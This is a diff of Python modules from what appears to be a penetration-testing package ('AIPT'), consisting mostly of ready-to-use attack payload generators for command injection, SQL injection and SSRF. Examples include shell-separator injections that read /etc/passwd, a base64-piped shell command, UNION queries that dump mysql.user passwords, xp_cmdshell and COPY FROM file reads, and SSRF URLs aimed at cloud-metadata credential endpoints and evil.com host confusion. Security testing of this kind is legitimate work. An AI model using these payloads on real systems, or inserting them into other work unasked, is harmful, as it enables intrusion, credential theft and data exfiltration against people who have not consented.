aiptx 2.0.2__py3-none-any.whl

aipt_v2/payloads/__init__.py

@@ -0,0 +1,27 @@
+"""
+AIPT Payloads Module
+
+Security testing payloads for various vulnerability classes:
+- XSS (Cross-Site Scripting)
+- SQL Injection
+- Command Injection
+- Path Traversal
+- SSRF (Server-Side Request Forgery)
+- Template Injection
+"""
+
+from .xss import XSSPayloads
+from .sqli import SQLiPayloads
+from .cmdi import CommandInjectionPayloads
+from .traversal import PathTraversalPayloads
+from .ssrf import SSRFPayloads
+from .templates import TemplateInjectionPayloads
+
+__all__ = [
+    "XSSPayloads",
+    "SQLiPayloads",
+    "CommandInjectionPayloads",
+    "PathTraversalPayloads",
+    "SSRFPayloads",
+    "TemplateInjectionPayloads",
+]

aipt_v2/payloads/cmdi.py

@@ -0,0 +1,150 @@
+"""
+AIPT Command Injection Payloads
+
+OS command injection payloads for security testing.
+"""
+from __future__ import annotations
+
+from typing import Iterator
+
+
+class CommandInjectionPayloads:
+    """
+    Command injection payload generator.
+
+    Categories:
+    - Unix: Linux/Mac command injection
+    - Windows: Windows command injection
+    - Blind: Out-of-band detection
+    - Filter bypass: Evasion techniques
+
+    Example:
+        cmdi = CommandInjectionPayloads()
+        for payload in cmdi.unix():
+            test(payload)
+    """
+
+    @classmethod
+    def unix(cls) -> Iterator[str]:
+        """Unix/Linux command injection payloads"""
+        commands = ["id", "whoami", "uname -a", "cat /etc/passwd"]
+
+        for cmd in commands:
+            payloads = [
+                # Command separators
+                f"; {cmd}",
+                f"| {cmd}",
+                f"|| {cmd}",
+                f"& {cmd}",
+                f"&& {cmd}",
+                f"`{cmd}`",
+                f"$({cmd})",
+
+                # Newline
+                f"\n{cmd}",
+                f"\r\n{cmd}",
+
+                # With quotes
+                f"'; {cmd}; '",
+                f'"; {cmd}; "',
+
+                # Null byte
+                f"%00{cmd}",
+            ]
+            yield from payloads
+
+    @classmethod
+    def windows(cls) -> Iterator[str]:
+        """Windows command injection payloads"""
+        commands = ["whoami", "dir", "ipconfig", "type C:\\Windows\\win.ini"]
+
+        for cmd in commands:
+            payloads = [
+                f"& {cmd}",
+                f"&& {cmd}",
+                f"| {cmd}",
+                f"|| {cmd}",
+                f"\r\n{cmd}",
+                f"'; {cmd}; '",
+            ]
+            yield from payloads
+
+    @classmethod
+    def blind_time(cls) -> Iterator[str]:
+        """Time-based blind detection"""
+        payloads = [
+            # Unix sleep
+            "; sleep 5",
+            "| sleep 5",
+            "& sleep 5",
+            "`sleep 5`",
+            "$(sleep 5)",
+            "'; sleep 5; '",
+
+            # Windows timeout
+            "& timeout 5",
+            "& ping -n 5 127.0.0.1",
+        ]
+        yield from payloads
+
+    @classmethod
+    def blind_dns(cls, domain: str) -> Iterator[str]:
+        """DNS-based out-of-band detection"""
+        payloads = [
+            f"; nslookup {domain}",
+            f"| nslookup {domain}",
+            f"`nslookup {domain}`",
+            f"$(nslookup {domain})",
+            f"; dig {domain}",
+            f"; host {domain}",
+            f"; curl {domain}",
+            f"; wget {domain}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def filter_bypass(cls) -> Iterator[str]:
+        """Filter bypass techniques"""
+        payloads = [
+            # Using wildcards
+            "/b?n/c?t /etc/passwd",
+            "/b??/cat /etc/passwd",
+            "/???/c?t /etc/passwd",
+
+            # Using environment variables
+            "$HOME",
+            "${HOME}",
+
+            # Hex encoding
+            "$'\\x69\\x64'",  # id
+
+            # Using quotes
+            "i'd'",
+            'i"d"',
+            "wh''oami",
+            'wh""oami',
+
+            # Using backslash
+            "wh\\oami",
+            "c\\at /etc/passwd",
+
+            # Using $@
+            "wh$@oami",
+            "c$@at /etc/passwd",
+
+            # Base64
+            "echo aWQ= | base64 -d | sh",
+
+            # Variable concatenation
+            "a=who;b=ami;$a$b",
+            "a=c;b=at;$a$b /etc/passwd",
+        ]
+        yield from payloads
+
+    @classmethod
+    def all(cls) -> Iterator[str]:
+        """All command injection payloads"""
+        yield from cls.unix()
+        yield from cls.windows()
+        yield from cls.blind_time()
+        yield from cls.filter_bypass()

aipt_v2/payloads/sqli.py

@@ -0,0 +1,263 @@
+"""
+AIPT SQL Injection Payloads
+
+SQL injection payloads for security testing.
+"""
+from __future__ import annotations
+
+from typing import Iterator
+
+
+class SQLiPayloads:
+    """
+    SQL injection payload generator.
+
+    Categories:
+    - Detection: Identify SQLi vulnerabilities
+    - Union-based: UNION SELECT extraction
+    - Error-based: Extract data via errors
+    - Blind: Boolean and time-based
+    - Stacked queries: Multiple statements
+
+    Example:
+        sqli = SQLiPayloads()
+
+        # Test for SQLi
+        for payload in sqli.detection():
+            if vulnerable(test(payload)):
+                exploit()
+    """
+
+    @classmethod
+    def detection(cls) -> Iterator[str]:
+        """Payloads to detect SQLi vulnerabilities"""
+        payloads = [
+            # Basic tests
+            "'",
+            '"',
+            "' OR '1'='1",
+            "' OR '1'='1'--",
+            "' OR '1'='1'#",
+            "' OR '1'='1'/*",
+            '" OR "1"="1',
+            '" OR "1"="1"--',
+
+            # Numeric
+            "1 OR 1=1",
+            "1 OR 1=1--",
+            "1' OR '1'='1",
+
+            # Comment-based
+            "'--",
+            "'#",
+            "'/*",
+            "' ;--",
+
+            # Tautology
+            "' OR 1=1--",
+            "' OR 'x'='x",
+            "' OR 1 --",
+            "') OR ('1'='1",
+
+            # Syntax error triggers
+            "'\"",
+            "' AND '1'='2",
+            "' AND '1'='1",
+
+            # NULL byte
+            "%00' OR '1'='1",
+
+            # Double URL encoding
+            "%2527",
+        ]
+        yield from payloads
+
+    @classmethod
+    def union_based(cls, columns: int = 5) -> Iterator[str]:
+        """UNION-based extraction payloads"""
+        null_cols = ",".join(["NULL"] * columns)
+
+        payloads = [
+            # Basic UNION
+            f"' UNION SELECT {null_cols}--",
+            f'" UNION SELECT {null_cols}--',
+            f"' UNION SELECT {null_cols}#",
+            f"' UNION ALL SELECT {null_cols}--",
+
+            # With information extraction
+            f"' UNION SELECT {','.join(['@@version' if i == 0 else 'NULL' for i in range(columns)])}--",
+            f"' UNION SELECT {','.join(['user()' if i == 0 else 'NULL' for i in range(columns)])}--",
+            f"' UNION SELECT {','.join(['database()' if i == 0 else 'NULL' for i in range(columns)])}--",
+
+            # Order by for column enumeration
+            "' ORDER BY 1--",
+            "' ORDER BY 2--",
+            "' ORDER BY 5--",
+            "' ORDER BY 10--",
+            "' ORDER BY 100--",
+        ]
+
+        # Column count enumeration
+        for i in range(1, 20):
+            cols = ",".join(["NULL"] * i)
+            payloads.append(f"' UNION SELECT {cols}--")
+
+        yield from payloads
+
+    @classmethod
+    def error_based(cls) -> Iterator[str]:
+        """Error-based extraction payloads"""
+        payloads = [
+            # MySQL
+            "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
+            "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT @@version)))--",
+            "' AND UPDATEXML(1,CONCAT(0x7e,(SELECT @@version)),1)--",
+
+            # PostgreSQL
+            "' AND 1=CAST((SELECT version()) AS INT)--",
+
+            # MSSQL
+            "' AND 1=CONVERT(INT,(SELECT @@version))--",
+
+            # Oracle
+            "' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE rownum=1))--",
+        ]
+        yield from payloads
+
+    @classmethod
+    def blind_boolean(cls) -> Iterator[str]:
+        """Boolean-based blind injection payloads"""
+        payloads = [
+            # True conditions
+            "' AND 1=1--",
+            "' AND 'a'='a",
+            "' AND 1--",
+            "' AND 1=1 AND ''='",
+
+            # False conditions
+            "' AND 1=2--",
+            "' AND 'a'='b",
+            "' AND 0--",
+
+            # Substring extraction
+            "' AND SUBSTRING(@@version,1,1)='5'--",
+            "' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--",
+
+            # Conditional
+            "' AND IF(1=1,1,0)--",
+            "' AND (SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END)--",
+        ]
+        yield from payloads
+
+    @classmethod
+    def blind_time(cls) -> Iterator[str]:
+        """Time-based blind injection payloads"""
+        payloads = [
+            # MySQL
+            "' AND SLEEP(5)--",
+            "' AND BENCHMARK(5000000,MD5('test'))--",
+            "' OR IF(1=1,SLEEP(5),0)--",
+
+            # PostgreSQL
+            "'; SELECT pg_sleep(5)--",
+            "' AND (SELECT CASE WHEN 1=1 THEN pg_sleep(5) END)--",
+
+            # MSSQL
+            "'; WAITFOR DELAY '0:0:5'--",
+            "' AND 1=(SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END WAITFOR DELAY '0:0:5')--",
+
+            # Oracle
+            "' AND 1=(SELECT CASE WHEN 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) END FROM dual)--",
+        ]
+        yield from payloads
+
+    @classmethod
+    def stacked_queries(cls) -> Iterator[str]:
+        """Stacked query payloads"""
+        payloads = [
+            # Information gathering
+            "'; SELECT @@version;--",
+            "'; SELECT user();--",
+            "'; SELECT database();--",
+
+            # MSSQL specific
+            "'; EXEC xp_cmdshell('whoami');--",
+
+            # PostgreSQL specific
+            "'; CREATE TABLE aipt_test(data text);--",
+            "'; COPY aipt_test FROM '/etc/passwd';--",
+        ]
+        yield from payloads
+
+    @classmethod
+    def bypass_filters(cls) -> Iterator[str]:
+        """Filter bypass payloads"""
+        payloads = [
+            # Case variations
+            "' oR '1'='1",
+            "' OR '1'='1",
+            "' Or '1'='1",
+
+            # Inline comments
+            "'/**/OR/**/1=1--",
+            "' UN/**/ION SEL/**/ECT NULL--",
+            "' UNION/**/SELECT/**/NULL--",
+
+            # Encoding
+            "' %4fR '1'='1",  # OR
+            "' %55NION %53ELECT NULL--",  # UNION SELECT
+
+            # Using functions
+            "' OR CHAR(49)=CHAR(49)--",
+            "' OR ASCII('1')=49--",
+
+            # Whitespace alternatives
+            "'\tOR\t'1'='1",
+            "'\nOR\n'1'='1",
+            "' OR\r\n'1'='1",
+
+            # No spaces
+            "'OR'1'='1'",
+            "'||'1'='1",
+
+            # Scientific notation
+            "' OR 1e0=1e0--",
+        ]
+        yield from payloads
+
+    @classmethod
+    def mysql_specific(cls) -> Iterator[str]:
+        """MySQL-specific payloads"""
+        payloads = [
+            # Version
+            "' UNION SELECT @@version--",
+            "' UNION SELECT VERSION()--",
+
+            # Users
+            "' UNION SELECT user FROM mysql.user--",
+            "' UNION SELECT CONCAT(user,':',password) FROM mysql.user--",
+
+            # Databases
+            "' UNION SELECT schema_name FROM information_schema.schemata--",
+
+            # Tables
+            "' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--",
+
+            # Columns
+            "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--",
+
+            # File operations
+            "' UNION SELECT LOAD_FILE('/etc/passwd')--",
+            "' INTO OUTFILE '/tmp/test.txt'--",
+        ]
+        yield from payloads
+
+    @classmethod
+    def all(cls) -> Iterator[str]:
+        """All SQLi payloads"""
+        yield from cls.detection()
+        yield from cls.union_based()
+        yield from cls.error_based()
+        yield from cls.blind_boolean()
+        yield from cls.blind_time()
+        yield from cls.bypass_filters()

aipt_v2/payloads/ssrf.py

@@ -0,0 +1,204 @@
+"""
+AIPT SSRF Payloads
+
+Server-Side Request Forgery payloads for security testing.
+"""
+from __future__ import annotations
+
+from typing import Iterator
+
+
+class SSRFPayloads:
+    """
+    SSRF payload generator.
+
+    Categories:
+    - Localhost: 127.0.0.1 variations
+    - Cloud metadata: AWS, GCP, Azure
+    - Internal networks: Common RFC1918 ranges
+    - Protocol smuggling: gopher, file, etc.
+
+    Example:
+        ssrf = SSRFPayloads()
+        for payload in ssrf.localhost():
+            test(f"/fetch?url={payload}")
+    """
+
+    @classmethod
+    def localhost(cls) -> Iterator[str]:
+        """Localhost bypass payloads"""
+        payloads = [
+            # Standard
+            "http://127.0.0.1",
+            "http://localhost",
+            "http://127.0.0.1:80",
+            "http://127.0.0.1:443",
+            "http://127.0.0.1:22",
+            "http://127.0.0.1:8080",
+
+            # IPv6
+            "http://[::1]",
+            "http://[0000::1]",
+
+            # Alternative representations
+            "http://127.1",
+            "http://127.0.1",
+            "http://2130706433",  # Decimal
+            "http://0x7f000001",  # Hex
+            "http://017700000001",  # Octal
+
+            # Redirects
+            "http://spoofed.burpcollaborator.net",
+
+            # Enclosed brackets
+            "http://[127.0.0.1]",
+
+            # URL encoding
+            "http://%31%32%37%2e%30%2e%30%2e%31",
+
+            # With credentials
+            "http://127.0.0.1@evil.com",
+            "http://evil.com@127.0.0.1",
+
+            # Domain confusion
+            "http://127.0.0.1.evil.com",
+            "http://127.0.0.1%00.evil.com",
+            "http://127.0.0.1%09.evil.com",
+        ]
+        yield from payloads
+
+    @classmethod
+    def cloud_metadata(cls) -> Iterator[str]:
+        """Cloud metadata service endpoints"""
+        payloads = [
+            # AWS
+            "http://169.254.169.254/latest/meta-data/",
+            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+            "http://169.254.169.254/latest/user-data/",
+            "http://169.254.169.254/latest/dynamic/instance-identity/document",
+
+            # GCP
+            "http://metadata.google.internal/computeMetadata/v1/",
+            "http://169.254.169.254/computeMetadata/v1/",
+
+            # Azure
+            "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
+            "http://169.254.169.254/metadata/identity/oauth2/token",
+
+            # DigitalOcean
+            "http://169.254.169.254/metadata/v1/",
+
+            # Oracle Cloud
+            "http://169.254.169.254/opc/v1/instance/",
+
+            # Alibaba Cloud
+            "http://100.100.100.200/latest/meta-data/",
+
+            # Kubernetes
+            "https://kubernetes.default.svc/",
+            "https://kubernetes.default/",
+        ]
+        yield from payloads
+
+    @classmethod
+    def internal_networks(cls) -> Iterator[str]:
+        """Internal network scanning payloads"""
+        # Common internal IPs
+        internal_ips = [
+            "10.0.0.1",
+            "10.0.0.254",
+            "192.168.0.1",
+            "192.168.1.1",
+            "192.168.1.254",
+            "172.16.0.1",
+            "172.31.0.1",
+        ]
+
+        # Common internal ports
+        ports = [22, 80, 443, 8080, 8443, 3306, 5432, 6379, 27017, 9200]
+
+        for ip in internal_ips:
+            yield f"http://{ip}"
+            for port in ports:
+                yield f"http://{ip}:{port}"
+
+    @classmethod
+    def protocols(cls) -> Iterator[str]:
+        """Protocol smuggling payloads"""
+        payloads = [
+            # File protocol
+            "file:///etc/passwd",
+            "file:///c:/windows/win.ini",
+            "file://localhost/etc/passwd",
+
+            # Gopher protocol (for internal service exploitation)
+            "gopher://127.0.0.1:6379/_INFO",
+            "gopher://127.0.0.1:11211/_stats",
+
+            # Dict protocol
+            "dict://127.0.0.1:6379/INFO",
+
+            # LDAP
+            "ldap://127.0.0.1",
+
+            # FTP
+            "ftp://127.0.0.1",
+            "sftp://127.0.0.1",
+
+            # SMB (Windows)
+            "\\\\127.0.0.1\\c$",
+
+            # Netdoc
+            "netdoc:///etc/passwd",
+        ]
+        yield from payloads
+
+    @classmethod
+    def filter_bypass(cls) -> Iterator[str]:
+        """Filter bypass techniques"""
+        payloads = [
+            # URL encoding
+            "http://%31%32%37%2e%30%2e%30%2e%31",
+
+            # Domain redirects (DNS rebinding setup required)
+            "http://localtest.me",  # Resolves to 127.0.0.1
+            "http://spoofed.burpcollaborator.net",
+
+            # Short URL redirects
+            "http://bit.ly/redirect-to-localhost",
+
+            # Using @ for URL confusion
+            "http://google.com@127.0.0.1",
+            "http://127.0.0.1#@google.com",
+            "http://127.0.0.1?@google.com",
+
+            # Case variations
+            "http://LOCALHOST",
+            "http://LocalHost",
+
+            # Dot variations
+            "http://127。0。0。1",  # Full-width dots
+
+            # CRLF injection
+            "http://127.0.0.1%0d%0a",
+        ]
+        yield from payloads
+
+    @classmethod
+    def with_callback(cls, callback_url: str) -> Iterator[str]:
+        """Payloads with external callback"""
+        payloads = [
+            callback_url,
+            f"{callback_url}?ssrf=test",
+            f"http://127.0.0.1@{callback_url.replace('http://', '')}",
+        ]
+        yield from payloads
+
+    @classmethod
+    def all(cls) -> Iterator[str]:
+        """All SSRF payloads"""
+        yield from cls.localhost()
+        yield from cls.cloud_metadata()
+        yield from cls.internal_networks()
+        yield from cls.protocols()
+        yield from cls.filter_bypass()